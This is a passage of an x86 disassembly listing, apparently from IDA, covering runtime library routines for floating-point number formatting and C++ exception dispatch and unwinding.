push 64h
cdq
pop esi
idiv esi
add [ecx], al
mov eax, ebx
cdq
idiv esi
mov ebx, edx
loc_41AB70: ; CODE XREF: sub_41AA8D+D0�j
inc ecx
cmp ebx, 0Ah
jl short loc_41AB87
mov eax, ebx
push 0Ah
cdq
pop esi
idiv esi
add [ecx], al
mov eax, ebx
cdq
idiv esi
mov ebx, edx
loc_41AB87: ; CODE XREF: sub_41AA8D+E7�j
add [ecx+1], bl
loc_41AB8A: ; CODE XREF: sub_41AA8D+BF�j
mov eax, [ebp+arg_4]
pop esi
pop ebx
pop ebp
retn
sub_41AA8D endp
; =============== S U B R O U T I N E =======================================
sub_41AB91 proc near ; CODE XREF: sub_41AD31+13�p
; sub_41AD54+1E�p
var_18 = qword ptr -18h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
cmp ds:byte_4C90F4, 0
push ebx
push ebp
mov ebp, [esp+8+arg_4]
push esi
push edi
jz short loc_41ABCC
mov eax, ds:dword_4C90F8
mov ebx, [esp+10h+arg_8]
mov esi, ds:dword_4C90F0
cmp eax, ebx
jnz short loc_41ABFC
xor ecx, ecx
cmp dword ptr [esi], 2Dh
setz cl
add ecx, eax
add ecx, ebp
mov eax, ecx
mov byte ptr [eax], 30h
and byte ptr [eax+1], 0
jmp short loc_41ABFC
; ---------------------------------------------------------------------------
loc_41ABCC: ; CODE XREF: sub_41AB91+F�j
mov eax, [esp+10h+arg_0]
push ecx
push ecx
fld qword ptr [eax]
fstp [esp+18h+var_18]
call sub_41E86B
mov ebx, [esp+18h+arg_8]
mov esi, eax
push esi
mov eax, [esi+4]
add eax, ebx
push eax
xor eax, eax
cmp dword ptr [esi], 2Dh
setz al
add eax, ebp
push eax
call sub_41E7F4
add esp, 14h
loc_41ABFC: ; CODE XREF: sub_41AB91+22�j
; sub_41AB91+39�j
cmp dword ptr [esi], 2Dh
mov edi, ebp
jnz short loc_41AC0A
mov byte ptr [ebp+0], 2Dh
lea edi, [ebp+1]
loc_41AC0A: ; CODE XREF: sub_41AB91+70�j
mov eax, [esi+4]
test eax, eax
jg short loc_41AC21
push 1
push edi
call sub_41ADA5
pop ecx
mov byte ptr [edi], 30h
pop ecx
inc edi
jmp short loc_41AC23
; ---------------------------------------------------------------------------
loc_41AC21: ; CODE XREF: sub_41AB91+7E�j
add edi, eax
loc_41AC23: ; CODE XREF: sub_41AB91+8E�j
test ebx, ebx
jle short loc_41AC68
push 1
push edi
call sub_41ADA5
mov al, ds:byte_42F570
pop ecx
mov [edi], al
mov esi, [esi+4]
inc edi
pop ecx
test esi, esi
jge short loc_41AC68
cmp ds:byte_4C90F4, 0
jz short loc_41AC4D
neg esi
jmp short loc_41AC53
; ---------------------------------------------------------------------------
loc_41AC4D: ; CODE XREF: sub_41AB91+B6�j
neg esi
cmp ebx, esi
jl short loc_41AC55
loc_41AC53: ; CODE XREF: sub_41AB91+BA�j
mov ebx, esi
loc_41AC55: ; CODE XREF: sub_41AB91+C0�j
push ebx
push edi
call sub_41ADA5
push ebx
push 30h
push edi
call sub_415500
add esp, 14h
loc_41AC68: ; CODE XREF: sub_41AB91+94�j
; sub_41AB91+AD�j
pop edi
mov eax, ebp
pop esi
pop ebp
pop ebx
retn
sub_41AB91 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AC6F proc near ; CODE XREF: sub_41AD54+34�p
var_14 = qword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
push ecx
push ecx
fld qword ptr [edi]
fstp [esp+14h+var_14]
call sub_41E86B
mov ds:dword_4C90F0, eax
mov ecx, [eax+4]
dec ecx
mov ebx, [ebp+arg_8]
mov ds:dword_4C90F8, ecx
xor ecx, ecx
cmp dword ptr [eax], 2Dh
push eax
push ebx
setz cl
add ecx, [ebp+arg_4]
mov esi, ecx
push esi
call sub_41E7F4
mov eax, ds:dword_4C90F0
add esp, 14h
mov ecx, [eax+4]
dec ecx
cmp ds:dword_4C90F8, ecx
setl cl
mov ds:byte_4C90FC, cl
mov eax, [eax+4]
dec eax
cmp eax, 0FFFFFFFCh
mov ds:dword_4C90F8, eax
jl short loc_41ACF5
cmp eax, ebx
jge short loc_41ACF5
test cl, cl
jz short loc_41ACE6
loc_41ACDC: ; CODE XREF: sub_41AC6F+72�j
mov al, [esi]
inc esi
test al, al
jnz short loc_41ACDC
and [esi-2], al
loc_41ACE6: ; CODE XREF: sub_41AC6F+6B�j
push ebx
push [ebp+arg_4]
push edi
call sub_41AD31
add esp, 0Ch
jmp short loc_41AD05
; ---------------------------------------------------------------------------
loc_41ACF5: ; CODE XREF: sub_41AC6F+63�j
; sub_41AC6F+67�j
push [ebp+arg_C]
push ebx
push [ebp+arg_4]
push edi
call sub_41AD0A
add esp, 10h
loc_41AD05: ; CODE XREF: sub_41AC6F+84�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_41AC6F endp
; =============== S U B R O U T I N E =======================================
sub_41AD0A proc near ; CODE XREF: sub_41AC6F+8E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push [esp+arg_C]
mov ds:byte_4C90F4, 1
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_41AA8D
and ds:byte_4C90F4, 0
add esp, 10h
retn
sub_41AD0A endp
; =============== S U B R O U T I N E =======================================
sub_41AD31 proc near ; CODE XREF: sub_41AC6F+7C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push [esp+arg_8]
mov ds:byte_4C90F4, 1
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_41AB91
and ds:byte_4C90F4, 0
add esp, 0Ch
retn
sub_41AD31 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AD54 proc near ; CODE XREF: sub_417F58+3AA�p
; DATA XREF: sub_415F31�o ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 65h
jz short loc_41AD8F
cmp [ebp+arg_8], 45h
jz short loc_41AD8F
cmp [ebp+arg_8], 66h
jnz short loc_41AD7C
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41AB91
add esp, 0Ch
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41AD7C: ; CODE XREF: sub_41AD54+13�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41AC6F
jmp short loc_41ADA0
; ---------------------------------------------------------------------------
loc_41AD8F: ; CODE XREF: sub_41AD54+7�j
; sub_41AD54+D�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41AA8D
loc_41ADA0: ; CODE XREF: sub_41AD54+39�j
add esp, 10h
pop ebp
retn
sub_41AD54 endp
; =============== S U B R O U T I N E =======================================
sub_41ADA5 proc near ; CODE XREF: sub_41AA8D+2C�p
; sub_41AB91+83�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push edi
mov edi, [esp+4+arg_4]
test edi, edi
jz short loc_41ADC8
push esi
mov esi, [esp+8+arg_0]
push esi
call sub_415C80
inc eax
push eax
push esi
add esi, edi
push esi
call sub_416470
add esp, 10h
pop esi
loc_41ADC8: ; CODE XREF: sub_41ADA5+7�j
pop edi
retn
sub_41ADA5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41ADCA proc near ; CODE XREF: _0:00416114�p
; sub_41617D+1B�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_10]
push edi
mov edi, 19930520h
cmp [esi], edi
jz short loc_41ADE0
call sub_41B672
loc_41ADE0: ; CODE XREF: sub_41ADCA+F�j
mov eax, [ebp+arg_0]
test byte ptr [eax+4], 66h
jz short loc_41AE08
cmp dword ptr [esi+4], 0
jz short loc_41AE5E
cmp [ebp+arg_14], 0
jnz short loc_41AE5E
push 0FFFFFFFFh
push esi
push [ebp+arg_C]
push [ebp+arg_4]
call sub_41B111
add esp, 10h
jmp short loc_41AE5E
; ---------------------------------------------------------------------------
loc_41AE08: ; CODE XREF: sub_41ADCA+1D�j
cmp dword ptr [esi+0Ch], 0
jz short loc_41AE5E
cmp dword ptr [eax], 0E06D7363h
jnz short loc_41AE42
cmp [eax+14h], edi
jbe short loc_41AE42
mov ecx, [eax+1Ch]
mov ecx, [ecx+8]
test ecx, ecx
jz short loc_41AE42
movzx edx, byte ptr [ebp+arg_1C]
push edx
push [ebp+arg_18]
push [ebp+arg_14]
push esi
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push eax
call ecx
add esp, 20h
jmp short loc_41AE61
; ---------------------------------------------------------------------------
loc_41AE42: ; CODE XREF: sub_41ADCA+4A�j
; sub_41ADCA+4F�j ...
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_1C]
push esi
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push eax
call sub_41AE65
add esp, 20h
loc_41AE5E: ; CODE XREF: sub_41ADCA+23�j
; sub_41ADCA+29�j ...
push 1
pop eax
loc_41AE61: ; CODE XREF: sub_41ADCA+76�j
pop edi
pop esi
pop ebp
retn
sub_41ADCA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AE65 proc near ; CODE XREF: sub_41ADCA+8C�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = byte ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 18h
mov eax, [ebp+arg_4]
and byte ptr [ebp+var_14], 0
mov eax, [eax+8]
cmp eax, 0FFFFFFFFh
mov [ebp+var_10], eax
jl short loc_41AE85
mov ecx, [ebp+arg_10]
cmp eax, [ecx+4]
jl short loc_41AE8A
loc_41AE85: ; CODE XREF: sub_41AE65+16�j
call sub_41B672
loc_41AE8A: ; CODE XREF: sub_41AE65+1E�j
push ebx
push esi
mov esi, [ebp+arg_0]
mov ebx, 0E06D7363h
push edi
mov edi, 19930520h
cmp [esi], ebx
jnz loc_41AFE1
cmp dword ptr [esi+10h], 3
jnz short loc_41AEFE
cmp [esi+14h], edi
jnz short loc_41AEFE
cmp dword ptr [esi+1Ch], 0
jnz short loc_41AEFE
mov esi, ds:dword_4C9100
test esi, esi
jz loc_41AFDC
mov eax, ds:dword_4C9104
push 1
push esi
mov [ebp+arg_8], eax
mov byte ptr [ebp+var_14], 1
call sub_41E9F2
pop ecx
test eax, eax
pop ecx
jnz short loc_41AEE0
call sub_41B672
loc_41AEE0: ; CODE XREF: sub_41AE65+74�j
cmp [esi], ebx
jnz loc_41AFE1
cmp dword ptr [esi+10h], 3
jnz short loc_41AEFE
cmp [esi+14h], edi
jnz short loc_41AEFE
cmp dword ptr [esi+1Ch], 0
jnz short loc_41AEFE
call sub_41B672
loc_41AEFE: ; CODE XREF: sub_41AE65+41�j
; sub_41AE65+46�j ...
cmp [esi], ebx
jnz loc_41AFE1
cmp dword ptr [esi+10h], 3
jnz loc_41AFE1
cmp [esi+14h], edi
jnz loc_41AFE1
mov edi, [ebp+var_10]
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_4]
push eax
push edi
push [ebp+arg_18]
push [ebp+arg_10]
call sub_4162CB
add esp, 14h
mov ebx, eax
loc_41AF35: ; CODE XREF: sub_41AE65+162�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_18]
jnb loc_41AFCC
cmp [ebx], edi
jg short loc_41AFC1
cmp edi, [ebx+4]
jg short loc_41AFC1
mov eax, [ebx+10h]
mov [ebp+arg_0], eax
mov eax, [ebx+0Ch]
test eax, eax
mov [ebp+var_C], eax
jle short loc_41AFBE
loc_41AF5A: ; CODE XREF: sub_41AE65+131�j
mov eax, [esi+1Ch]
mov eax, [eax+0Ch]
lea edi, [eax+4]
mov eax, [eax]
test eax, eax
mov [ebp+var_8], eax
jle short loc_41AF8B
loc_41AF6C: ; CODE XREF: sub_41AE65+124�j
push dword ptr [esi+1Ch]
push dword ptr [edi]
push [ebp+arg_0]
call sub_41B0B4
add esp, 0Ch
test eax, eax
jnz short loc_41AF9A
dec [ebp+var_8]
add edi, 4
cmp [ebp+var_8], eax
jg short loc_41AF6C
loc_41AF8B: ; CODE XREF: sub_41AE65+105�j
dec [ebp+var_C]
add [ebp+arg_0], 10h
cmp [ebp+var_C], 0
jg short loc_41AF5A
jmp short loc_41AFBE
; ---------------------------------------------------------------------------
loc_41AF9A: ; CODE XREF: sub_41AE65+119�j
push [ebp+var_14]
push [ebp+arg_1C]
push [ebp+arg_18]
push ebx
push dword ptr [edi]
push [ebp+arg_0]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call sub_41B1C5
add esp, 2Ch
loc_41AFBE: ; CODE XREF: sub_41AE65+F3�j
; sub_41AE65+133�j
mov edi, [ebp+var_10]
loc_41AFC1: ; CODE XREF: sub_41AE65+DE�j
; sub_41AE65+E3�j
inc [ebp+var_4]
add ebx, 14h
jmp loc_41AF35
; ---------------------------------------------------------------------------
loc_41AFCC: ; CODE XREF: sub_41AE65+D6�j
cmp [ebp+arg_14], 0
jz short loc_41AFDC
push 1
push esi
call sub_41B53A
pop ecx
pop ecx
loc_41AFDC: ; CODE XREF: sub_41AE65+56�j
; sub_41AE65+16B�j ...
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_41AFE1: ; CODE XREF: sub_41AE65+37�j
; sub_41AE65+7D�j ...
cmp [ebp+arg_14], 0
jnz short loc_41B007
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+var_10]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call sub_41B00C
add esp, 20h
jmp short loc_41AFDC
; ---------------------------------------------------------------------------
loc_41B007: ; CODE XREF: sub_41AE65+180�j
jmp sub_41B61C
sub_41AE65 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B00C proc near ; CODE XREF: sub_41AE65+198�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push ecx
push ecx
cmp ds:dword_4C9108, 0
push esi
push edi
jz short loc_41B03D
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4161A2
add esp, 1Ch
test eax, eax
jnz short loc_41B0B0
loc_41B03D: ; CODE XREF: sub_41B00C+E�j
mov edi, [ebp+arg_14]
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push edi
push [ebp+arg_18]
push [ebp+arg_10]
call sub_4162CB
add esp, 14h
mov esi, eax
loc_41B059: ; CODE XREF: sub_41B00C+A2�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_8]
jnb short loc_41B0B0
cmp edi, [esi]
jl short loc_41B0A8
cmp edi, [esi+4]
jg short loc_41B0A8
mov eax, [esi+0Ch]
mov ecx, [esi+10h]
shl eax, 4
add eax, ecx
mov ecx, [eax-0Ch]
test ecx, ecx
jz short loc_41B082
cmp byte ptr [ecx+8], 0
jnz short loc_41B0A8
loc_41B082: ; CODE XREF: sub_41B00C+6E�j
push 1
add eax, 0FFFFFFF0h
push [ebp+arg_1C]
push [ebp+arg_18]
push esi
push 0
push eax
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41B1C5
add esp, 2Ch
loc_41B0A8: ; CODE XREF: sub_41B00C+57�j
; sub_41B00C+5C�j ...
inc [ebp+var_4]
add esi, 14h
jmp short loc_41B059
; ---------------------------------------------------------------------------
loc_41B0B0: ; CODE XREF: sub_41B00C+2F�j
; sub_41B00C+53�j
pop edi
pop esi
leave
retn
sub_41B00C endp
; =============== S U B R O U T I N E =======================================
sub_41B0B4 proc near ; CODE XREF: sub_41AE65+10F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
mov edi, [esp+8+arg_0]
mov eax, [edi+4]
test eax, eax
jz short loc_41B10B
cmp byte ptr [eax+8], 0
lea edx, [eax+8]
jz short loc_41B10B
mov esi, [esp+8+arg_4]
mov ecx, [esi+4]
cmp eax, ecx
jz short loc_41B0E5
add ecx, 8
push ecx
push edx
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz short loc_41B107
loc_41B0E5: ; CODE XREF: sub_41B0B4+1F�j
test byte ptr [esi], 2
jz short loc_41B0EF
test byte ptr [edi], 8
jz short loc_41B107
loc_41B0EF: ; CODE XREF: sub_41B0B4+34�j
mov eax, [esp+8+arg_8]
mov eax, [eax]
test al, 1
jz short loc_41B0FE
test byte ptr [edi], 1
jz short loc_41B107
loc_41B0FE: ; CODE XREF: sub_41B0B4+43�j
test al, 2
jz short loc_41B10B
test byte ptr [edi], 2
jnz short loc_41B10B
loc_41B107: ; CODE XREF: sub_41B0B4+2F�j
; sub_41B0B4+39�j ...
xor eax, eax
jmp short loc_41B10E
; ---------------------------------------------------------------------------
loc_41B10B: ; CODE XREF: sub_41B0B4+B�j
; sub_41B0B4+14�j ...
push 1
pop eax
loc_41B10E: ; CODE XREF: sub_41B0B4+55�j
pop edi
pop esi
retn
sub_41B0B4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B111 proc near ; CODE XREF: sub_41ADCA+34�p
; sub_41B1C5+42�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_422848
push offset sub_41D894
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov ebx, [ebp+arg_0]
mov esi, [ebx+8]
mov [ebp+var_1C], esi
mov edi, [ebp+arg_8]
loc_41B143: ; CODE XREF: sub_41B111+8A�j
cmp esi, [ebp+arg_C]
jz short loc_41B19D
cmp esi, 0FFFFFFFFh
jle short loc_41B152
cmp esi, [edi+4]
jl short loc_41B157
loc_41B152: ; CODE XREF: sub_41B111+3A�j
call sub_41B672
loc_41B157: ; CODE XREF: sub_41B111+3F�j
and [ebp+var_4], 0
mov eax, [edi+8]
mov eax, [eax+esi*8+4]
test eax, eax
jz short loc_41B172
push 103h
push ebx
push eax
call sub_41B5D0
loc_41B172: ; CODE XREF: sub_41B111+53�j
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_41B192
; ---------------------------------------------------------------------------
push [ebp+var_14]
call sub_41B1AF
pop ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
mov edi, [ebp+arg_8]
mov ebx, [ebp+arg_0]
mov esi, [ebp+var_1C]
loc_41B192: ; CODE XREF: sub_41B111+65�j
mov eax, [edi+8]
mov esi, [eax+esi*8]
mov [ebp+var_1C], esi
jmp short loc_41B143
; ---------------------------------------------------------------------------
loc_41B19D: ; CODE XREF: sub_41B111+35�j
mov [ebx+8], esi
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_41B111 endp
; =============== S U B R O U T I N E =======================================
sub_41B1AF proc near ; CODE XREF: sub_41B111+6A�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov eax, [eax]
cmp dword ptr [eax], 0E06D7363h
jz short loc_41B1C0
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41B1C0: ; CODE XREF: sub_41B1AF+C�j
jmp sub_41B61C
sub_41B1AF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B1C5 proc near ; CODE XREF: sub_41AE65+151�p
; sub_41B00C+94�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
push ebp
mov ebp, esp
cmp [ebp+arg_18], 0
push ebx
mov ebx, [ebp+arg_14]
push esi
push edi
mov edi, [ebp+arg_4]
jz short loc_41B1E7
push [ebp+arg_18]
push ebx
push edi
push [ebp+arg_0]
call sub_41B376
add esp, 10h
loc_41B1E7: ; CODE XREF: sub_41B1C5+10�j
cmp [ebp+arg_24], 0
push [ebp+arg_0]
jnz short loc_41B1F3
push edi
jmp short loc_41B1F6
; ---------------------------------------------------------------------------
loc_41B1F3: ; CODE XREF: sub_41B1C5+29�j
push [ebp+arg_24]
loc_41B1F6: ; CODE XREF: sub_41B1C5+2C�j
call sub_4160A4
mov esi, [ebp+arg_1C]
push dword ptr [esi]
push [ebp+arg_10]
push [ebp+arg_C]
push edi
call sub_41B111
mov eax, [esi+4]
push 100h
push [ebp+arg_20]
inc eax
mov [edi+8], eax
push dword ptr [ebx+0Ch]
push [ebp+arg_10]
push [ebp+arg_8]
push edi
push [ebp+arg_0]
call sub_41B240
add esp, 2Ch
test eax, eax
jz short loc_41B23B
push edi
push eax
call sub_416062
loc_41B23B: ; CODE XREF: sub_41B1C5+6D�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_41B1C5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B240 proc near ; CODE XREF: sub_41B1C5+63�p
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_422858
push offset sub_41D894
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, [ebp+arg_10]
mov [ebp+var_2C], eax
xor ebx, ebx
mov [ebp+var_24], ebx
mov esi, [ebp+arg_4]
mov ecx, [esi-4]
mov [ebp+var_28], ecx
mov ecx, ds:dword_4C9100
mov [ebp+var_1C], ecx
mov ecx, ds:dword_4C9104
mov [ebp+var_20], ecx
mov edi, [ebp+arg_0]
mov ds:dword_4C9100, edi
mov ecx, [ebp+arg_8]
mov ds:dword_4C9104, ecx
mov [ebp+var_4], ebx
mov [ebp+var_4], 1
push [ebp+arg_18]
push [ebp+arg_14]
push eax
push [ebp+arg_C]
push esi
call sub_416129
add esp, 14h
mov [ebp+var_2C], eax
mov [ebp+var_4], ebx
or [ebp+var_4], 0FFFFFFFFh
call sub_41B306
mov eax, [ebp+var_2C]
loc_41B2CD: ; CODE XREF: sub_41B2E6+16�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_41B240 endp
; =============== S U B R O U T I N E =======================================
sub_41B2DC proc near ; DATA XREF: _1:00422868�o
push dword ptr [ebp-14h]
call sub_41B34C
pop ecx
retn
sub_41B2DC endp
; =============== S U B R O U T I N E =======================================
sub_41B2E6 proc near ; DATA XREF: _1:0042286C�o
mov esp, [ebp-18h]
and dword ptr [ebp-2Ch], 0
push 0FFFFFFFFh
lea eax, [ebp-10h]
push eax
call sub_41638A
pop ecx
pop ecx
xor eax, eax
jmp short loc_41B2CD
sub_41B2E6 endp
; ---------------------------------------------------------------------------
loc_41B2FE: ; DATA XREF: _1:00422860�o
xor ebx, ebx
mov esi, [ebp+0Ch]
mov edi, [ebp+8]
; =============== S U B R O U T I N E =======================================
sub_41B306 proc near ; CODE XREF: sub_41B240+85�p
mov eax, [ebp-28h]
mov [esi-4], eax
mov eax, [ebp-1Ch]
mov ds:dword_4C9100, eax
mov eax, [ebp-20h]
mov ds:dword_4C9104, eax
cmp dword ptr [edi], 0E06D7363h
jnz short locret_41B34B
cmp dword ptr [edi+10h], 3
jnz short locret_41B34B
cmp dword ptr [edi+14h], 19930520h
jnz short locret_41B34B
cmp [ebp-24h], ebx
jnz short locret_41B34B
cmp [ebp-2Ch], ebx
jz short locret_41B34B
call sub_4163F2
push eax
push edi
call sub_41B53A
pop ecx
pop ecx
locret_41B34B: ; CODE XREF: sub_41B306+1C�j
; sub_41B306+22�j ...
retn
sub_41B306 endp
; =============== S U B R O U T I N E =======================================
sub_41B34C proc near ; CODE XREF: sub_41B2DC+3�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov eax, [eax]
cmp dword ptr [eax], 0E06D7363h
jnz short loc_41B373
cmp dword ptr [eax+10h], 3
jnz short loc_41B373
cmp dword ptr [eax+14h], 19930520h
jnz short loc_41B373
cmp dword ptr [eax+1Ch], 0
jnz short loc_41B373
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_41B373: ; CODE XREF: sub_41B34C+C�j
; sub_41B34C+12�j ...
xor eax, eax
retn
sub_41B34C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B376 proc near ; CODE XREF: sub_41B1C5+1A�p
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_422870
push offset sub_41D894
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov ecx, [ebp+arg_8]
mov eax, [ecx+4]
test eax, eax
jz loc_41B51F
cmp byte ptr [eax+8], 0
jz loc_41B51F
mov eax, [ecx+8]
test eax, eax
jz loc_41B51F
mov edx, [ebp+arg_4]
lea edi, [eax+edx+0Ch]
and [ebp+var_4], 0
test byte ptr [ecx], 8
jz short loc_41B413
mov esi, [ebp+arg_0]
push 1
push dword ptr [esi+18h]
call sub_41E9F2
pop ecx
pop ecx
test eax, eax
jz loc_41B516
push 1
push edi
call sub_41EA0E
pop ecx
pop ecx
test eax, eax
jz loc_41B516
mov eax, [esi+18h]
mov [edi], eax
mov ecx, [ebp+arg_C]
add ecx, 8
push ecx
loc_41B404: ; CODE XREF: sub_41B376+F5�j
push eax
call sub_41B5A1
pop ecx
pop ecx
mov [edi], eax
jmp loc_41B51B
; ---------------------------------------------------------------------------
loc_41B413: ; CODE XREF: sub_41B376+57�j
mov esi, [ebp+arg_C]
test byte ptr [esi], 1
jz short loc_41B46D
mov ebx, [ebp+arg_0]
push 1
push dword ptr [ebx+18h]
call sub_41E9F2
pop ecx
pop ecx
test eax, eax
jz loc_41B516
push 1
push edi
call sub_41EA0E
pop ecx
pop ecx
test eax, eax
jz loc_41B516
push dword ptr [esi+14h]
push dword ptr [ebx+18h]
push edi
call sub_416470
add esp, 0Ch
cmp dword ptr [esi+14h], 4
jnz loc_41B51B
mov eax, [edi]
test eax, eax
jz loc_41B51B
add esi, 8
push esi
jmp short loc_41B404
; ---------------------------------------------------------------------------
loc_41B46D: ; CODE XREF: sub_41B376+A3�j
cmp dword ptr [esi+18h], 0
mov ebx, [ebp+arg_0]
push 1
push dword ptr [ebx+18h]
jnz short loc_41B4B5
call sub_41E9F2
pop ecx
pop ecx
test eax, eax
jz loc_41B516
push 1
push edi
call sub_41EA0E
pop ecx
pop ecx
test eax, eax
jz short loc_41B516
push dword ptr [esi+14h]
add esi, 8
push esi
push dword ptr [ebx+18h]
call sub_41B5A1
pop ecx
pop ecx
push eax
push edi
call sub_416470
add esp, 0Ch
jmp short loc_41B51B
; ---------------------------------------------------------------------------
loc_41B4B5: ; CODE XREF: sub_41B376+103�j
call sub_41E9F2
pop ecx
pop ecx
test eax, eax
jz short loc_41B516
push 1
push edi
call sub_41EA0E
pop ecx
pop ecx
test eax, eax
jz short loc_41B516
push dword ptr [esi+18h]
call sub_41EA2A
pop ecx
test eax, eax
jz short loc_41B516
test byte ptr [esi], 4
jz short loc_41B4FC
push 1
lea eax, [esi+8]
push eax
push dword ptr [ebx+18h]
call sub_41B5A1
pop ecx
pop ecx
push eax
push dword ptr [esi+18h]
push edi
call sub_41609D
jmp short loc_41B51B
; ---------------------------------------------------------------------------
loc_41B4FC: ; CODE XREF: sub_41B376+168�j
lea eax, [esi+8]
push eax
push dword ptr [ebx+18h]
call sub_41B5A1
pop ecx
pop ecx
push eax
push dword ptr [esi+18h]
